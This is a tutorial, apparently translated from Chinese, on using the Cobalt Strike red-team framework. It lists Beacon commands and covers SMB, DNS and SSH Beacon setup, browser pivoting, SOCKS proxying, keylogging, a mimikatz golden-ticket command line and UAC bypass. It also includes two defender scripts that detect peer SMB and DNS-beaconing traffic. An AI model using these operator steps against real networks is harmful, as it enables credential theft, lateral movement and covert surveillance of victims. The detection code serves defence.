Lately I have been going back over the Cobalt Strike (CS) basics again.

0x01 Beacon commands

Beacon Commands
===============

Command                  Description
-------                  -----------
argue                    Spoof arguments for matching processes
blockdlls                Block non-Microsoft DLLs in child processes
browserpivot             Setup a browser pivot session
bypassuac                Spawn a session in a high integrity process
cancel                   Cancel a download that's in-progress
cd                       Change directory
checkin                  Call home and post data
clear                    Clear beacon queue
connect                  Connect to a Beacon peer over TCP
covertvpn                Deploy Covert VPN client
cp                       Copy a file
dcsync                   Extract a password hash from a DC
desktop                  View and interact with target's desktop
dllinject                Inject a Reflective DLL into a process
dllload                  Load DLL into a process with LoadLibrary()
download                 Download a file
downloads                Lists file downloads in progress
drives                   List drives on target
elevate                  Try to elevate privileges
execute                  Execute a program on target (no output)
execute-assembly         Execute a local .NET program in-memory on target
exit                     Terminate the beacon session
getprivs                 Enable system privileges on current token
getsystem                Attempt to get SYSTEM
getuid                   Get User ID
hashdump                 Dump password hashes
help                     Help menu
inject                   Spawn a session in a specific process
jobkill                  Kill a long-running post-exploitation task
jobs                     List long-running post-exploitation tasks
kerberos_ccache_use      Apply kerberos ticket from cache to this session
kerberos_ticket_purge    Purge kerberos tickets from this session
kerberos_ticket_use      Apply kerberos ticket to this session
keylogger                Inject a keystroke logger into a process
kill                     Kill a process
link                     Connect to a Beacon peer over a named pipe
logonpasswords           Dump credentials and hashes with mimikatz
ls                       List files
make_token               Create a token to pass credentials
mimikatz                 Runs a mimikatz command
mkdir                    Make a directory
mode dns                 Use DNS A as data channel (DNS beacon only)
mode dns-txt             Use DNS TXT as data channel (DNS beacon only)
mode dns6                Use DNS AAAA as data channel (DNS beacon only)
mode http                Use HTTP as data channel
mv                       Move a file
net                      Network and host enumeration tool
note                     Assign a note to this Beacon
portscan                 Scan a network for open services
powerpick                Execute a command via Unmanaged PowerShell
powershell               Execute a command via powershell.exe
powershell-import        Import a powershell script
ppid                     Set parent PID for spawned post-ex jobs
ps                       Show process list
psexec                   Use a service to spawn a session on a host
psexec_psh               Use PowerShell to spawn a session on a host
psinject                 Execute PowerShell command in specific process
pth                      Pass-the-hash using Mimikatz
pwd                      Print current directory
reg                      Query the registry
rev2self                 Revert to original token
rm                       Remove a file or folder
rportfwd                 Setup a reverse port forward
run                      Execute a program on target (returns output)
runas                    Execute a program as another user
runasadmin               Execute a program in a high-integrity context
runu                     Execute a program under another PID
screenshot               Take a screenshot
setenv                   Set an environment variable
shell                    Execute a command via cmd.exe
shinject                 Inject shellcode into a process
shspawn                  Spawn process and inject shellcode into it
sleep                    Set beacon sleep time
socks                    Start SOCKS4a server to relay traffic
socks stop               Stop SOCKS4a server
spawn                    Spawn a session
spawnas                  Spawn a session as another user
spawnto                  Set executable to spawn processes into
spawnu                   Spawn a session under another PID
ssh                      Use SSH (password) to spawn an SSH session on a host
ssh-key                  Use SSH (key file) to spawn an SSH session on a host
steal_token              Steal access token from a process
timestomp                Apply timestamps from one file to another
unlink                   Disconnect from parent Beacon
upload                   Upload a file
wdigest                  Dump plaintext credentials with mimikatz
winrm                    Use WinRM to spawn a session on a host
wmi                      Use WMI to spawn a session on a host
Use interact to start working with a Beacon.
Beacon can egress over either DNS or HTTP, and you can even switch between HTTP and DNS while the Beacon is communicating.
To get results back quickly, set beacon> sleep 0
0x02 Common Beacon tunnels
TCP Beacon

SMB Beacon
From the official documentation:
The SMB Beacon uses named pipes to communicate through a parent Beacon. Once two Beacons are linked, the child Beacon receives its tasks from the parent Beacon and sends its output back through it.
Because linked Beacons communicate over Windows named pipes, this traffic is encapsulated in the SMB protocol, so the SMB Beacon is relatively stealthy and can work wonders for getting past firewalls.

The host running the SMB Beacon must accept connections on port 445.

spawn as > select the matching listener > the session checks in
Or, in the Beacon, use the command spawn listenername



This is the spawned SMB Beacon.
It is currently in the linked state; in the Beacon, use link <ip> to link it or unlink <ip> to disconnect it.
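The defender-side flip side of the above: linked SMB Beacons ride on named pipes over TCP/445 between peers, so workstation-to-workstation SMB connections are the traffic shape to hunt for. The script below is an added example (not code from the original post or from Cobalt Strike) that walks a constructed set of flow records against a constructed asset inventory and reports every workstation that reached another workstation on port 445. The record format, the role inventory and the IP addresses are all assumptions made for this example.

```python
"""Flag workstation-to-workstation SMB (TCP/445) connections in flow records.

Added defender-side example; not code from the original post or from
Cobalt Strike. The flow-record format and the role inventory below are
constructed assumptions for this example.
"""
from collections import defaultdict

# Constructed inventory (assumption): which IPs are servers and which are workstations.
ASSET_ROLES = {
    "10.0.1.10": "file-server",
    "10.0.1.11": "domain-controller",
    "10.0.2.21": "workstation",
    "10.0.2.22": "workstation",
    "10.0.2.23": "workstation",
    "10.0.2.24": "workstation",
}

# Constructed flow records, one per line: "<epoch> <src_ip> <dst_ip> <dst_port> <proto>".
# Workstations talking SMB to the file server or DC is normal; workstations
# talking SMB to each other (lines 4, 5, 6, 8) is the peer-to-peer pattern.
SAMPLE_FLOWS = """\
1700000000 10.0.2.21 10.0.1.10 445 tcp
1700000001 10.0.2.22 10.0.1.10 445 tcp
1700000002 10.0.2.23 10.0.1.11 445 tcp
1700000003 10.0.2.21 10.0.2.22 445 tcp
1700000004 10.0.2.21 10.0.2.23 445 tcp
1700000005 10.0.2.22 10.0.2.24 445 tcp
1700000006 10.0.2.22 10.0.1.10 443 tcp
1700000007 10.0.2.24 10.0.2.21 445 tcp
1700000008 10.0.2.23 10.0.3.99 445 tcp
"""

SMB_PORT = 445


def parse_flows(text):
    """Parse the constructed format into (epoch, src, dst, dst_port, proto) tuples."""
    flows = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 5:
            continue  # skip malformed lines
        epoch, src, dst, port, proto = parts
        flows.append((int(epoch), src, dst, int(port), proto.lower()))
    return flows


def peer_smb_flows(flows, roles):
    """Return only the flows where a known workstation talks SMB to another known workstation.

    IPs missing from the inventory are not flagged: an unknown destination is a
    separate inventory problem, not evidence of a linked Beacon.
    """
    return [
        f for f in flows
        if f[3] == SMB_PORT and f[4] == "tcp"
        and roles.get(f[1]) == "workstation"
        and roles.get(f[2]) == "workstation"
    ]


def peer_graph(flows, roles):
    """Map each flagged source workstation to the sorted list of workstation peers it reached over SMB."""
    graph = defaultdict(set)
    for _epoch, src, dst, _port, _proto in peer_smb_flows(flows, roles):
        graph[src].add(dst)
    return {src: sorted(dsts) for src, dsts in graph.items()}


if __name__ == "__main__":
    for src, peers in peer_graph(parse_flows(SAMPLE_FLOWS), ASSET_ROLES).items():
        print(f"{src} -> {', '.join(peers)}")
```

Treat the output as a hunting lead rather than an alert on its own: admin shares, printer sharing and some management agents also produce workstation-to-workstation SMB, so the graph should be compared against a baseline of what is normal for the environment. A chain of flagged hosts (A reaching B, B reaching C) is the shape a tree of linked Beacons would leave behind.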
DNS Beacon
The DNS Beacon is very effective for getting past firewalls and for persistence.

Domain configuration for DNS check-in:
An A record pointing to the server IP --> NS records all pointing to the A record's hostname

NS records
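Seen from the resolver logs, the DNS Beacon's data channels (mode dns, mode dns-txt, mode dns6) show up as one client issuing a stream of unique, encoded-looking subdomains under a single parent domain, with A, TXT and AAAA lookups mixed in. The following is an added detection example written for this post; it is not code from the original post or from Cobalt Strike. It parses a constructed query log, profiles each client/parent-domain pair by subdomain churn and leftmost-label entropy, and reports the pairs that look like a DNS data channel. The log format, the thresholds and the "parent domain = last two labels" rule are assumptions made for the example.

```python
"""Flag the DNS-beaconing traffic shape in a DNS query log.

Added defender-side example; not code from the original post or from
Cobalt Strike. The log format, the thresholds and the "last two labels
are the parent domain" rule are assumptions for this example.
"""
import math
from collections import defaultdict

# Constructed sample log, one query per line: "<epoch> <client_ip> <qtype> <qname>".
# 10.0.0.5 issues many unique, random-looking subdomains under cdn-stats.net,
# mixing A, TXT and AAAA lookups; 10.0.0.7 only resolves ordinary hostnames.
SAMPLE_LOG = """\
1700000000 10.0.0.5 A www.example.com
1700000002 10.0.0.5 A mail.example.com
1700000003 10.0.0.5 A 7f3a9c1e2b4d.cdn-stats.net
1700000004 10.0.0.5 TXT 0c8e5a2f91b7.cdn-stats.net
1700000005 10.0.0.5 TXT a4d1f7e0c3b9.cdn-stats.net
1700000006 10.0.0.5 AAAA 5e2b8c4a6f1d.cdn-stats.net
1700000007 10.0.0.5 A 9b1d3e7c5a2f.cdn-stats.net
1700000008 10.0.0.5 TXT e6c2a8f4d0b1.cdn-stats.net
1700000009 10.0.0.5 A 2f7e1c9a4b3d.cdn-stats.net
1700000010 10.0.0.5 AAAA c1a9e3f5b7d2.cdn-stats.net
1700000011 10.0.0.7 A www.example.com
1700000012 10.0.0.7 A static.example.com
1700000013 10.0.0.7 A img.example.com
"""


def shannon_entropy(s):
    """Bits of entropy per character of s (0.0 for an empty string)."""
    if not s:
        return 0.0
    n = len(s)
    counts = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def parent_domain(qname):
    """Assumption: the registrable domain is the last two labels.
    Production code should use a public-suffix list instead."""
    labels = qname.rstrip(".").lower().split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else labels[0]


def parse_log(text):
    """Parse the constructed log format into (epoch, client, qtype, qname) tuples."""
    records = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 4:
            continue  # skip malformed lines
        epoch, client, qtype, qname = parts
        records.append((int(epoch), client, qtype.upper(), qname.lower()))
    return records


def profile(records):
    """Aggregate per (client, parent domain): unique names, TXT/AAAA count, leftmost-label entropy."""
    stats = defaultdict(lambda: {"names": set(), "data_queries": 0, "entropies": []})
    for _epoch, client, qtype, qname in records:
        s = stats[(client, parent_domain(qname))]
        s["names"].add(qname)
        if qtype in ("TXT", "AAAA"):  # the dns-txt / dns6 data channels
            s["data_queries"] += 1
        s["entropies"].append(shannon_entropy(qname.split(".")[0]))
    return stats


def find_beacons(records, min_unique=5, min_entropy=3.0):
    """Return client/domain pairs whose leftmost labels look encoded and churn quickly."""
    hits = []
    for (client, domain), s in profile(records).items():
        unique = len(s["names"])
        mean_entropy = sum(s["entropies"]) / len(s["entropies"])
        if unique >= min_unique and mean_entropy >= min_entropy:
            hits.append({
                "client": client,
                "domain": domain,
                "unique_subdomains": unique,
                "txt_aaaa_queries": s["data_queries"],
                "mean_label_entropy": round(mean_entropy, 2),
            })
    return sorted(hits, key=lambda h: h["unique_subdomains"], reverse=True)


if __name__ == "__main__":
    for hit in find_beacons(parse_log(SAMPLE_LOG)):
        print(hit)
```

Both thresholds need tuning against real traffic: CDNs, anti-virus cloud lookups and some telemetry also generate high-entropy subdomains, so the unique-subdomain count per time window and the share of TXT/AAAA queries are what separate a data channel from ordinary noise. Pair this with the NS-record setup described above: a newly registered domain whose NS records point at a single hostname, receiving this query pattern from one internal client, is a strong lead.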

SSH Beacon
Brute-forcing SSH hosts on the internal network may turn something up, and it can be done straight from the CS implant.
Two ways to connect an SSH Beacon:
1. Connect directly with a password
Beacon command:
ssh [target:port] [user] [pass]
2. Connect with an SSH key
ssh [target:port] [user] [/path/to/key.pem]
After a successful connection, a child Beacon checks in.
0x03 Common commands
Browserpivot
Injects into the victim's browser process and then opens an HTTP proxy.
Use ps/tasklist to find the browser process ID, for example:

Inject into the process:
beacon> browserpivot 1580
Once injection into the browser process succeeds, it shows: Browser Pivot HTTP proxy is at: xxx.xxx.xxx.xxx:<port>

然后就可以設置本地HTTP瀏覽器代理
當然當被攻擊者關閉瀏覽器的時候,代理也就失效了,關閉此代理可使用如下命令:browserpivot stop

Socks
Starts a SOCKS4a proxy so that internal-network penetration testing can be proxied through the Beacon.
beacon> socks <port>


socks        Start the SOCKS4 proxy
socks stop   Stop the SOCKS4 proxy
Then configure a proxy tool, e.g. in proxychains.conf add: socks4 127.0.0.1 9999
Screenshot
Captures screenshots of the victim's screen over a period of time; the command is:
Or: beacon> screenshot
Then open View -> Screenshots to see the captures.
Keylogger (keystroke logger)

Open View -> Keystrokes to see the captured keystrokes.

powershell-import
Imports PowerShell offensive frameworks such as nishang's Powerpreter; run directly:
beacon> powershell-import

Or run directly:
powershell-import [/path/to/local/script.ps1]
To run a particular module, use a command of the following form, for example
beacon> powershell xxx-xxx
kerberos
There are three modules in total,
covering the usual domain techniques: passing ordinary tickets, and golden/silver ticket attacks.
kerberos_ccache_use      Import a ticket from a ccache file
kerberos_ticket_purge    Purge the current session's tickets
kerberos_ticket_use      Import a ticket from a ticket file
Using mimikatz:
kerberos::golden /admin:USER /domain:DOMAIN /sid:SID /krbtgt:HASH /ticket:FILE
BypassUAC
Run directly:
beacon> bypassuac

